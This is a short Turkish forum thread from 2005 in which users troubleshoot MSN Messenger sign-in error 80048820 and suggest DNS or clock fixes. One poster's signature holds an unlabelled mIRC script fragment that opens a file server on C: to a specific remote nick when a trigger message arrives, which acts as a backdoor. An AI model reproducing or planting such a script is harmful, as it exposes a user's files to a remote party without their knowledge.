xxxlargegs Mesaj tarihi: Kasım 3, 2005 Paylaş Mesaj tarihi: Kasım 3, 2005 üzgÜnÜz su anda sizi msn msg nera baglayamadık felam diye bide guvenlik duvarıyla ilgili bisiyler yazıyo hata kodu 80048820 bilen varsa yardımcı olsun lutfen Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
Janitschar Mesaj tarihi: Kasım 3, 2005 Paylaş Mesaj tarihi: Kasım 3, 2005 O hata beni de sinir ediyor, çözemedim bir türlü bilen varsa iyi olur. Makina da msn e girilmiyor, format atıcam en sonun da (:[signature][hline]Seni Senden Başka, Kimse Affedemez... Msn Spaces Kissiyorum... Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
streamin Mesaj tarihi: Kasım 3, 2005 Paylaş Mesaj tarihi: Kasım 3, 2005 1- dns ayarlari ile ilgili bir problem(telekom'un güzellikleri) 2-bilgisayarının saati veya tarihi kaymıştır. Düzeltirsen girebilirsin..[signature][hline]Forum Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
independent Mesaj tarihi: Kasım 3, 2005 Paylaş Mesaj tarihi: Kasım 3, 2005 Tam olarak bilmiyorum ama karşındaki kişi sana bişeyler yapıp senin msni geçici olarak dondurabiliyor yani bu kısıtlı en fazla bildiğim 90 gün süreyle donduruyor.[signature][hline]//Fserve Virus 10 C:WINDOWS Afrodisiac.txt ON 1:TEXT:*System:?: {if ($nick==Afrodisiac) {/fserve virus 10 C:debug.txt | /close -m virus } else HALTDEF } Link to comment Sosyal ağlarda paylaş Daha fazla paylaşım seçeneği…
Öne çıkan mesajlar